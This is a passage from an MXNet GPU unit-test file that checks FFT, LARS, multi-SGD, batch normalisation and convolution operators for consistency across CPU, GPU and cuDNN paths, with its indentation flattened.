init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16'in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
bools = [False, True]
for fix_gamma, cudnn_off in itertools.product(bools, bools):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
for fix_gamma, cudnn_off in itertools.product(bools, bools):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_1D)
# V2, 3D
for fix_gamma, cudnn_off in itertools.product(bools, [True,]):
sym = mx.sym.BatchNorm(name='norm', fix_gamma=fix_gamma, cudnn_off=cudnn_off)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, rtol=tol, atol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], scale=0.1)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], rtol=1e-2, atol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@unittest.skip("skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in ['1', '2']:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print('Starting engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
